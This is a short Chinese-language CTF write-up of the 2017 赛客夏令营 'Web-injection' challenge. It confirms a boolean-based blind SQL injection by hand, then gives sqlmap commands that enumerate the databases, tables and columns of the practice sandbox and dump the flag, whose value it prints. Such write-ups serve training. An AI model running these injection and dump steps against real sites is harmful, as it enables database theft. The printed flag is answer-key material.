2017-赛客夏令营-Web-injection

看题目名字,应该是一道SQL注入。

首先,根据下面的payload,1=1时返回为错误界面,1=2时返回正确界面,判断是数字型布尔盲注。

/index.php?id=1%20and%201=1

使用sqlmap可以解决,这里方便起见就不写脚本浪费时间了。

sqlmap -u "http://challenge-fdab85e96e53ea1f.sandbox.ctfhub.com:10800/index.php?id=1" --dbs

跑出结果
2017-赛客夏令营-Web-injection_第1张图片

列出数据表

sqlmap -u "http://challenge-fdab85e96e53ea1f.sandbox.ctfhub.com:10800/index.php?id=1" -D "ctfhub" --tables

跑出数据表
2017-赛客夏令营-Web-injection_第2张图片

列出字段

sqlmap -u "http://challenge-fdab85e96e53ea1f.sandbox.ctfhub.com:10800/index.php?id=1" -D "ctfhub" -T flag --columns

跑出字段名
2017-赛客夏令营-Web-injection_第3张图片

获取字段内容

sqlmap -u "http://challenge-fdab85e96e53ea1f.sandbox.ctfhub.com:10800/index.php?id=1" -D "ctfhub" -T flag -C flag -dump

flag内容如下
2017-赛客夏令营-Web-injection_第4张图片

ctfhub{bdbc1cf4ec1c51dcd026d86d}

你可能感兴趣的:(CTF,ctf,sql)